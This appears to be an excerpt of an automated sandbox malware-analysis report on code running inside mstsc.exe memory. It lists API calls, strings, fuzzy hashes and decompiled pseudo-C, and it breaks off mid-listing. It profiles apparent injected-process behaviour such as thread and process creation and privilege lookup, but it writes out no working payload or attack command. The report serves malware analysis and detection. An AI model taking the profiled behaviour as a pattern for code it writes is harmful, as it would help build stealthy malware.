net.dll, xrefs: 000D90A1, 000D9127, 000D90FF, 000D910B, 000D9133
wininet.dll, xrefs: 000D908E, 000D9097

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 1c15537c637d506b5088ce6831729260f576d5ad2db93eba1dee9af712fb02bd
Instruction ID: 8fdd52523c7ac28d7f640240957fdfed39c2402dc01589866f5066b26db6e19d
Opcode Fuzzy Hash: 1c15537c637d506b5088ce6831729260f576d5ad2db93eba1dee9af712fb02bd
Instruction Fuzzy Hash: 2A316FB6501705ABD725DF64C8A1FA7B7F8AF48700F10811EF61A9B242D770A945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000D9029 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000007D0), ref: 000D90D8

Strings

net.dll, xrefs: 000D90A1, 000D90FF, 000D910B
wininet.dll, xrefs: 000D908E, 000D9097

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: eedfed6f7c96e1241a42f0bed07a3f6aba81388ac4727b09639981264d464368
Instruction ID: 1e97bb1f550a181c53ec2e24578070bee15053d6ff4458b3f91ab6aec8490d40
Opcode Fuzzy Hash: eedfed6f7c96e1241a42f0bed07a3f6aba81388ac4727b09639981264d464368
Instruction Fuzzy Hash: B9217EB6601705AFD721DF69C8A5FABBBB8EF88700F10811EF6195B342D770A545CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000C7680 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 000C76DA
PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 000C76FB

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 23ff2eef3b228a259b2ba45b449187bf6c6c2c7717686149248ba4aa10bcfba3
Instruction ID: d6d61ec4f3096bec6fdb097d3579cca8438c4244d6ef9423036d515b9421fb6f
Opcode Fuzzy Hash: 23ff2eef3b228a259b2ba45b449187bf6c6c2c7717686149248ba4aa10bcfba3
Instruction Fuzzy Hash: 9F018431A803297BE720A7959C43FFE776C9B45B51F040119FF04BA1C2EA94690546F6

Uniqueness

Uniqueness Score: -1.00%

Function 000CA140 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000CA1B2

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: c06de1ea13a8af031dc4c62c0dda777427f6ee9b41022bae029d2c9e7cdc61ad
Instruction ID: 052ebe0307073cffcbd15b547bc94ebe47112b37a01f8d72c3e10d30486799c0
Opcode Fuzzy Hash: c06de1ea13a8af031dc4c62c0dda777427f6ee9b41022bae029d2c9e7cdc61ad
Instruction Fuzzy Hash: 81010CB5E4020DABDB10EBA4DC42FDEB7B89B55308F0441A9AD0997242F631EB14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 000DA690 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 000DA6E4

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
Instruction ID: 1a98c946fbeeb914e7f7acf1fa2ea2403c58097d4ddf9871fe99300f7e34a963
Opcode Fuzzy Hash: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
Instruction Fuzzy Hash: 3B01B2B2210208BFCB54DF89DC80EEB77ADEF8C754F158258BA0D97241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000D9153 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CD2F0,?,?), ref: 000D919C

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 6a3c653eb95446242ab25097f4705a6bf3d7cf87e5c080aefc390fcdb235777f
Instruction ID: cd7ca169501db02bfce32c6be694aab58b42f5153e07941da4b37480b5958744
Opcode Fuzzy Hash: 6a3c653eb95446242ab25097f4705a6bf3d7cf87e5c080aefc390fcdb235777f
Instruction Fuzzy Hash: 9EF0E5363803103BE3206568CC13FE737589F85B25F14012EFA8AAB3C2D591F94246E4

Uniqueness

Uniqueness Score: -1.00%

Function 000D9160 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CD2F0,?,?), ref: 000D919C

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 16809be654502e1535f31eed24f698d23d9c723d2a2eeed363768dc1ccac579f
Instruction ID: bb67e2e8cbe1d24728c940d35f45de0853c58991e201cfe2e90c8aa855f8c971
Opcode Fuzzy Hash: 16809be654502e1535f31eed24f698d23d9c723d2a2eeed363768dc1ccac579f
Instruction Fuzzy Hash: 00E06D3338131437E22061A99C02FE7B38C9B80B21F55012AFA4DEB2C2D591F90142A4

Uniqueness

Uniqueness Score: -1.00%

Function 000DA620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 000DA64D

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
Instruction ID: 99b192ce9999673008009c5831137c19bb34df7a7c334d9dc92fd1da20487298
Opcode Fuzzy Hash: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
Instruction Fuzzy Hash: 1EE012B1200208ABDB14EF89DC49EA737ACEF88750F118159BA085B242C630E9108AB1

Uniqueness

Uniqueness Score: -1.00%

Function 000DA780 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,000CD5C2,000CD5C2,?,00000000,?,?), ref: 000DA7B0

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
Instruction ID: 2c848babd81f30dddcfd427d1b970649d0473644d54a082ebedbabdf148b28f2
Opcode Fuzzy Hash: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
Instruction Fuzzy Hash: 3CE01AB12002086BDB10DF89CC45EE737ADEF89654F118165BA0857242C530E8148AB1

Uniqueness

Uniqueness Score: -1.00%

Function 000DA5E0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(000D5186,?,000D58FF,000D58FF,?,000D5186,?,?,?,?,?,00000000,00000005,00000206), ref: 000DA60D

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
Instruction ID: 8bd36b00dec6290f8efc831d53dbdd8e836eaed1748fc9073d2526ab522c9200
Opcode Fuzzy Hash: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
Instruction Fuzzy Hash: D6E012B1200208ABDB14EF89DC85EAB37ACEF88654F118155BA085B242CA30F9108AB1

Uniqueness

Uniqueness Score: -1.00%

Function 000CDA30 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003,?,?,000C8233,?), ref: 000CDA5B

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 785235cf212cd6fac8d19be006f72e66bb65ffde2b76f0b6724cfa02a8199225
Instruction ID: e7127ed50544142cf3b322f4f972d86d8bd31f5d7267ea6c5a754f94d28fb659
Opcode Fuzzy Hash: 785235cf212cd6fac8d19be006f72e66bb65ffde2b76f0b6724cfa02a8199225
Instruction Fuzzy Hash: ACD0A77164030437F610EBE49C43F6633CC9B48B51F454074FA09D73C3E950F4008165

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 025E8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E025E8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E025E8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E025CE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E025E718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E025E8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E025E718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E025E8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E025E8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E025E8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E025E718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E025CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E025C2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E025DE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E025CE2A8(_t322,  &_v68, _v16);
								if(E025E5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E025DE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E025CE2A8(_t322,  &_v68, _t236);
								if(E025E5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E025E718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E025CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E025C2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E025DE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E025CE2A8(_v12,  &_v68, _v16);
							if(E025E5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E025DE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E025CE2A8(_t322,  &_v68, _t269);
							if(E025E5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E025E718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E025CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E025C2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E025DE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E025CE2A8(_v12,  &_v68, _v16);
						if(E025E5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E025DE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E025CE2A8(_t322,  &_v68, _t296);
						if(E025E5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x025e8788
0x025e8788
0x025e8791
0x025e8794
0x025e8798
0x025e879b
0x025e879e
0x025e87a1
0x025e87a4
0x025e87a7
0x025e87aa
0x025e87af
0x02631ad3
0x025e8b0a
0x025e8b0d
0x025e8b13
0x025e8b19
0x025e8b1f
0x025e8b25
0x025e8b2b
0x025e8b31
0x025e8b37
0x025e8b3d
0x025e8b46
0x025e8b46
0x025e87c6
0x025e87d0
0x02631ae0
0x02631ae6
0x02631af8
0x02631af8
0x02631afd
0x02631afe
0x02631b01
0x02631b06
0x02631b06
0x025e87d6
0x025e87f2
0x025e87f7
0x025e8807
0x025e880a
0x025e880f
0x025e8810
0x025e8813
0x025e8818
0x025e8818
0x025e882c
0x025e8831
0x025e8838
0x025e8908
0x025e8920
0x025e89f0
0x025e8a08
0x025e8af6
0x025e8af6
0x025e8af8
0x025e8afb
0x02631beb
0x02631beb
0x025e8b04
0x02631bf8
0x02631c0e
0x02631c13
0x02631c16
0x02631c16
0x02631bf8
0x00000000
0x025e8b04
0x025e8a0e
0x025e8a11
0x025e8a14
0x025e8a15
0x025e8a18
0x025e8a22
0x025e8b59
0x025e8a28
0x025e8a3c
0x025e8a3c
0x025e8a42
0x02631bb0
0x02631b11
0x02631b11
0x00000000
0x025e8a48
0x025e8a51
0x025e8a5b
0x025e8a5e
0x025e8a61
0x025e8a69
0x025e8a69
0x025e8a6d
0x00000000
0x00000000
0x025e8a74
0x025e8a7c
0x025e8a7d
0x025e8a91
0x025e8a93
0x025e8a93
0x025e8a98
0x025e8a9b
0x025e8aa1
0x025e8aa1
0x025e8aa4
0x025e8aaa
0x025e8ab1
0x025e8ac5
0x025e8ac7
0x025e8ac7
0x025e8ac5
0x025e8ace
0x02631bc9
0x02631bce
0x02631bd2
0x02631bd2
0x025e8ad8
0x025e8aeb
0x025e8aeb
0x025e8af0
0x025e8af4
0x00000000
0x025e8af4
0x025e8a42
0x025e8926
0x025e8929
0x025e892c
0x025e892d
0x025e8930
0x025e8935
0x025e893a
0x025e8b51
0x025e8940
0x025e8954
0x025e8954
0x025e895a
0x02631b63
0x00000000
0x025e8960
0x025e8969
0x025e8973
0x025e8976
0x025e8979
0x025e897e
0x025e8981
0x025e8981
0x025e8986
0x00000000
0x00000000
0x02631b6e
0x02631b74
0x02631b7b
0x02631b8f
0x02631b91
0x02631b91
0x02631b99
0x02631b9c
0x02631ba2
0x02631ba2
0x025e898c
0x025e8992
0x025e8999
0x025e89ad
0x02631ba8
0x02631ba8
0x025e89ad
0x025e89b6
0x025e89c8
0x025e89cd
0x025e89d0
0x025e89d0
0x025e89d6
0x025e89e8
0x025e89e8
0x025e89ed
0x00000000
0x025e89ed
0x025e895a
0x025e883e
0x025e8841
0x025e8844
0x025e8845
0x025e8848
0x025e884d
0x025e8852
0x025e8b49
0x025e8858
0x025e886c
0x025e886c
0x025e8872
0x02631b0e
0x00000000
0x025e8878
0x025e8881
0x025e888b
0x025e888e
0x025e8891
0x025e8896
0x025e8899
0x025e8899
0x025e889e
0x00000000
0x00000000
0x02631b21
0x02631b27
0x02631b2e
0x02631b42
0x02631b44
0x02631b44
0x02631b4c
0x02631b4f
0x02631b55
0x02631b55
0x025e88a4
0x025e88aa
0x025e88b1
0x025e88c5
0x02631b5b
0x02631b5b
0x025e88c5
0x025e88ce
0x025e88e0
0x025e88e5
0x025e88e8
0x025e88e8
0x025e88ee
0x025e8900
0x025e8900
0x025e8905
0x00000000
0x025e8905

APIs

_wcspbrk.LIBCMT ref: 025E8891
_wcspbrk.LIBCMT ref: 025E8979
_wcspbrk.LIBCMT ref: 025E8A61
_wcspbrk.LIBCMT ref: 025E8A9B
_wcspbrk.LIBCMT ref: 02631B9C

Strings

WindowsExcludedProcs, xrefs: 025E87C1
Kernel-MUI-Language-SKU, xrefs: 025E89FC
Kernel-MUI-Number-Allowed, xrefs: 025E87E6
Kernel-MUI-Language-Disallowed, xrefs: 025E8914
Kernel-MUI-Language-Allowed, xrefs: 025E8827

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: 21780019972813ad2d69e163f1dc0abd4ae8975f671ce059ca4f0cf44427fa7b
Instruction ID: 0806cf663957517554e4b4abe69ab7818d25ebcdd015eaa6d128ae5883901ffe
Opcode Fuzzy Hash: 21780019972813ad2d69e163f1dc0abd4ae8975f671ce059ca4f0cf44427fa7b
Instruction Fuzzy Hash: 77F1D5B1D00209EFCF15DF98C985AEEBBB9FF48314F1444AAE506A7220E7349A45DF64

Uniqueness

Uniqueness Score: -1.00%

Function 026013CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E026013CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E025F7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x25c2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E025F7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x25c9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E025F7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E025F7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E025F7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E025F7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x026013d5
0x026013d9
0x026013dc
0x026013de
0x026013e1
0x026013e8
0x026013ee
0x0262e8fd
0x00000000
0x0262e921
0x0262e921
0x0262e928
0x0262e982
0x0262e98a
0x00000000
0x0262e99a
0x0262e99e
0x0262e9a3
0x0262e9a8
0x0262e9b9
0x0262e978
0x00000000
0x0262e978
0x0262e98a
0x0262e92a
0x0262e931
0x0262e944
0x0262e944
0x0262e950
0x0262e954
0x0262e959
0x0262e95e
0x0262e963
0x0262e970
0x00000000
0x0262e975
0x0262e93b
0x0262e980
0x00000000
0x0262e980
0x0262e942
0x0262e94b
0x00000000
0x0262e94b
0x00000000
0x0262e942
0x026013f4
0x026013f4
0x026013f9
0x026013fc
0x026013ff
0x02601406
